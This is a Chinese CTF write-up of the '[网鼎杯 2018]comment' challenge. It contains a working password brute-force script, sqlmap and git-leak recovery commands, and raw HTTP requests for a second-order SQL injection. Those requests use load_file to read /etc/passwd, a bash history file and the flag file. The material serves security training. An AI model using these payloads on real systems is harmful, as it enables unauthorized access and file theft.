0%

[网鼎杯 2018]comment

2025-08-06 19:27By
fenghot
二次注入SQL注入git泄漏

Problem: [网鼎杯 2018]comment

登录进去发现给了提示,zhangwei 密码zhangwei***
爆破脚本如下

import requests import threading import queue import time # 目标URL url = "http://node4.anna.nssctf.cn:28445/login.php" # 账号固定 username = "zhangwei" # 创建密码队列 (000-999) password_queue = queue.Queue() for i in range(1000): password = f"zhangwei{i:03d}" # 格式化为三位数 password_queue.put(password) # 成功标志 found = False # 爆破线程 def brute_force(): global found while not password_queue.empty() and not found: try: password = password_queue.get() # 构造POST数据 data = { "username": username, "password": password } # 发送请求 response = requests.post(url, data=data) # 检查响应 (根据实际题目调整判断条件) if "username or password error" not in response.text and "incorrect" not in response.text: print(f"\n[+] 成功找到密码! {password}") print(f"[+] 响应内容: {response.text[:200]}...") # 打印部分响应 found = True break else: print(f"[-] 尝试: {password} - 失败") except Exception as e: print(f"[!] 请求错误: {e}") finally: password_queue.task_done() # 创建多线程加速 threads = [] for i in range(20): # 20个线程 t = threading.Thread(target=brute_force) t.daemon = True t.start() threads.append(t) # 等待队列完成 try: start_time = time.time() password_queue.join() if not found: print("\n[!] 未找到有效密码,请检查判断条件") elapsed = time.time() - start_time print(f"\n[+] 爆破完成! 用时: {elapsed:.2f}秒") except KeyboardInterrupt: print("\n[!] 用户中断") found = True exit()

NSSIMAGE
成功爆破出密码为666

下一步sqlmap.py一键扫描一下

python sqlmap.py -u "http://node4.anna.nssctf.cn:28445/comment.php?id=1" --cookie="Hm_lvt_648a44a949074de73151ffaa0a832aec=1727873749,1728461632;PHPSESSID=odeaqjl1en8g7prisvo5amb617" --random-agent --fresh-queries --no-cast --dbs --level=3 --risk=2 --flush-session

发现失败了
找不到注入的地方
能输入的东西太多了,一个一个试太麻烦

那就扫一下用dirsearch工具

python -m dirsearch -u "http://node4.anna.nssctf.cn:28445/"

NSSIMAGE
githacker --url http://node4.anna.nssctf.cn:28445/.git/ --output-folder '/Users/27176/desktop'

进入write_do所在目录

<?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./login.php"); die(); } if(isset($_GET['do'])){ switch ($_GET['do']) { case 'write': break; case 'comment': break; default: header("Location: ./index.php"); } } else{ header("Location: ./index.php"); } ?>

代码不全
git log --all查看代码版本
看到第一个 e5b2a2443c2b6d395d06960123142bc91123148c
git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c成功恢复内容

<?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./login.php"); die(); } if(isset($_GET['do'])){ switch ($_GET['do']) { case 'write': $category = addslashes($_POST['category']); $title = addslashes($_POST['title']); $content = addslashes($_POST['content']); $sql = "insert into board set category = '$category', title = '$title', content = '$content'"; $result = mysql_query($sql); header("Location: ./index.php"); break; case 'comment': $bo_id = addslashes($_POST['bo_id']); $sql = "select category from board where id='$bo_id'"; $result = mysql_query($sql); $num = mysql_num_rows($result); if($num>0){ $category = mysql_fetch_array($result)['category']; $content = addslashes($_POST['content']); $sql = "insert into comment set category = '$category', content = '$content', bo_id = '$bo_id'"; $result = mysql_query($sql); } header("Location: ./comment.php?id=$bo_id"); break; default: header("Location: ./index.php"); } } else{ header("Location: ./index.php"); } ?>

接下来的payload就很简单了
二次注入点: 'write'里

$category = mysql_fetch_array($result)['category']; $sql = "insert into comment set category = '$category' ...";

$category 从数据库读取后直接拼接到SQL语句中
注意项目的SQL语句为多行,所以需要#和/**/配合使用
用write和content结合注释掉其他的

POST /write_do.php?do=write HTTP/1.1 Host: node4.anna.nssctf.cn:28468 Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1727873749,1728461632; PHPSESSID=odeaqjl1en8g7prisvo5amb617 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Origin: http://node4.anna.nssctf.cn:28468 Referer: http://node4.anna.nssctf.cn:28468/index.php Priority: u=0, i Content-Length: 44 title=test&category=test',content=database(),/*&content=test
POST /write_do.php?do=comment HTTP/1.1 Host: node4.anna.nssctf.cn:28468 Referer: http://node4.anna.nssctf.cn:28468/comment.php?id=6 Priority: u=0, i Origin: http://node4.anna.nssctf.cn:28468 Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1727873749,1728461632; PHPSESSID=odeaqjl1en8g7prisvo5amb617 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 19 content=*/#&bo_id=6

NSSIMAGE

注入成功,现在查表,查列就行了
最后查来查去表列里又没有它

这题不是常规的
读一下文件

title=test&category=test',content=((select(load_file("/etc/passwd")))),/*&content=test

NSSIMAGE

发现WEB系统用户home目录
看看有没有线索
title=test&category=test',content=((select(load_file("/home/www/.bash_history")))),/*&content=test
NSSIMAGE
可以看到当前项由html.zip在原本/tmp目录下解压再复制到/var/www,并且记录了关于项目html文件结构的.DS_Store在/tmp目录中仍存在一份,去读取这个文件了解下项目结构。

title=test&category=test',content=((select(load_file("/tmp/html/.DS_Store")))),/*&content=test
读取到乱码
NSSIMAGE

转成16进制
title=test&category=test',content=((select(hex(load_file("/tmp/html/.DS_Store"))))),/*&content=test

NSSIMAGE
得到了flag_8946e1ff1ee3e40f.php
读取
content=(hex(load_file("/var/www/html/flag_8946e1ff1ee3e40f.php")))
NSSIMAGE
成功

参考见:https://www.cnblogs.com/Article-kelp/p/16077919.html
工具:https://www.ontools.top/pages/asciiToHex

还没有人赞赏,快来当第一个赞赏的人吧!
  
© 著作权归作者所有
加载失败
广告
×
评论区
添加新评论